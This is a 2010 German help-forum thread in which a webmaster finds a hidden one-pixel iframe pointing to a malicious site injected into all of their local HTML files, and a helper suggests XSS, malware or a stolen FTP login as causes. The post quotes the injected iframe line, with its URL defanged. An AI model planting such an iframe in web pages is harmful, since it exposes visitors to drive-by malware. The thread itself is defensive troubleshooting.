Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: h**p://www.Brenz.pl/rc/

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 12.05.2010, 16:56   #1
claudi22
 
h**p://www.Brenz.pl/rc/ - Standard

h**p://www.Brenz.pl/rc/



Hi ihr,

ich habe gerade einen frisch formatierten PC vor mir, der leider letzten Monat von Viren und Trojanern überwältigt wurde. Jetzt versuche ich grade, so langsam alle gesicherten Daten wieder rüberzuziehen und z.B. an meiner Homepage weiterzuarbeiten. Nun fiel mir dabei auf, dass sich auf jede bestehende .html meiner Seite ein Code eingeschlichen hat, genauer sieht das so aus:

<iframe style="height:1px" src="h**p://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>

Ich kann mir überhaupt nicht erklären, wie das dorthin kam. Wenn ich es öffnen will steht da eine Seite mit Warnung "Die Webseite auf brenz.pl wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert."

Hat dazu jemand eine Idee? Ich hab's nun erstmal in jedem Quelltext wieder rausgelöscht...

Viele Grüße,
Claudi

Alt 12.05.2010, 17:05   #2
Omnibus
 
h**p://www.Brenz.pl/rc/ - Standard

h**p://www.Brenz.pl/rc/



Ggf. eine existierende XSS - Lücke auf deiner Website.
Hast du irgendwelche Gästebücher,Suchfunktionen, Newsletter sonder sonstige Sachen auf der Seite, wo Besucher etwas eingeben können ?
Arbeitest du mit PHP ? Wenn ja, schau dir mal Funktionen wie htmlspecialchars() an

Bearbeitest du den Quellcode local auf deiner Maschine ? Wenn ja, könnte auch ein Programm den entsprechenden iframe in jedes Quelldokument geschrieben haben. Dann sollte man zudem dein Rechner noch einmal durch checken auf Malware.
__________________


Alt 12.05.2010, 17:19   #3
claudi22
 
h**p://www.Brenz.pl/rc/ - Standard

h**p://www.Brenz.pl/rc/



Hi und vielen Dank für Deine Antwort!

Die Webseite ist bisher noch gar nicht "aktiv" online, d.h. abgesehen von nicht mal 5 verschiedenen Personen hat sie noch niemand gesehen und daher auch noch keinen weiteren Zugriff gehabt. Ich habe sie bisher nur zu Probezwecken hochgeladen und um mal wenige Leute draufschauen zu lassen. Gästebuch etc. hat sie nicht, nur ein Kontaktformular (freeware, PHP, hab ich nicht selbst erstellt). Eingetragen hat sich aber auch dort bisher niemand.

Mit PHP kenne ich mich leider nicht aus und habe die Homepage bisher nur mit HTML und CSS bearbeitet. Das Programm, das ich nutze, ist Notepad++.
Ich habe nun gerade versucht, mal meine alte HP von 2008 in Notepad zu öffnen. Auch dort erscheint dann derselbe Code. Damit liegt nahe, dass es an Notepad liegt? Oder ich schon wieder ein Problem auf dem PC habe?

Virenscan hab ich gerade eben erst gemacht, da gab es keine Funde.
__________________

Alt 12.05.2010, 17:32   #4
Omnibus
 
h**p://www.Brenz.pl/rc/ - Standard

h**p://www.Brenz.pl/rc/



Nein, Notepad++ nutze ich selber (neben Dreamweaver), wenn schnell was editiert werden muss. Der Iframe ist definitiv als Schadcode zu werten.
Wenn es auf allen Quelldokumenten ist, bzw. auf mehreren scheint sich entweder
a) jemand dran zu schaffen gemacht zu haben (Freundes/Bekanntenkreis)
b) irgend ein Malwareprogramm versucht so sich weiter zu verbreiten.
c) jemand hatte Zugriff auf deinen FTP-Server

Ich tendiere eher zu Möglichkeit 'c'. Entferne unbedingt den iframe auf jeder deiner Seiten. Ändere auch umgehen deine Passwörter für deinen FTP - Server.

'b' wäre auch noch denkbar, dafür bin ich leider nicht der richtige Ansprechpartner.

Alt 12.05.2010, 18:27   #5
claudi22
 
h**p://www.Brenz.pl/rc/ - Standard

h**p://www.Brenz.pl/rc/



Hi nochmal,

ich meinte nicht, dass Notepad an sich der Fehler ist, sondern dass sich dort eventuell was eingenistet hätte. Aber wie gesagt - der Virenscanner gibt keinen Laut.

Theorie a würde ich ausschließen

Theorie b klingt logisch, finde es aber erschreckend, was es inzwischen alles gibt, wovor man sich schützen müsste/sollte - da rechnet ja keiner mit ...

Theorie c ... hmmm, 2 Dienstleister hatten bisher mein FTP Passwort. Allerdings haben mir beide geraten, das Passwort anschließend wieder zu ändern. Die schienen eigentlich recht vertrauensselig. Dass es jemand geknackt hat kann natürlich immer sein, da versteh ich aber die Intention nicht. Denn meine Seiten sind alle ohne Schadcode online, der Schadcode ist nur auf den Dateien auf meiner Festplatte. Wer sich also per FTP einhackt und den Schadcode auf die html Seiten macht müsste ja der Logik nach die Seiten dann auch hochladen...

Auf alle Fälle danke für Deine Hilfe! Ich hoffe, das Zeug bleibt weg, wenn ich die Seiten ohne Schadcode neu abspeichere und das FTP Passwort ändere...


Alt 12.05.2010, 18:32   #6
Omnibus
 
h**p://www.Brenz.pl/rc/ - Standard

h**p://www.Brenz.pl/rc/



Zitat:
Zitat von claudi22 Beitrag anzeigen
Hi nochmal,
Denn meine Seiten sind alle ohne Schadcode online, der Schadcode ist nur auf den Dateien auf meiner Festplatte
Okay, dass wusste ich nicht.
Ja entferne es. Wenn es wieder auftaucht, hier melden für ein Systemcheck. Passwort immer ändern, wenn es wer anderes in der Hand hatte!

Noch viel Erfolg mit deiner Homepage,
Omnibus

Antwort

Themen zu h**p://www.Brenz.pl/rc/
attackierende, code, daten, erklären, formatierte, frisch, gemeldet, grund, homepage, iframe, langsam, quelltext, seite, sicherheitseinstellungen, style, troja, trojaner, trojanern, versuche, viren, warnung, webseite, überhaupt, öffnen




Zum Thema h**p://www.Brenz.pl/rc/ - Hi ihr, ich habe gerade einen frisch formatierten PC vor mir, der leider letzten Monat von Viren und Trojanern überwältigt wurde. Jetzt versuche ich grade, so langsam alle gesicherten Daten - h**p://www.Brenz.pl/rc/...
Archiv
Du betrachtest: h**p://www.Brenz.pl/rc/ auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.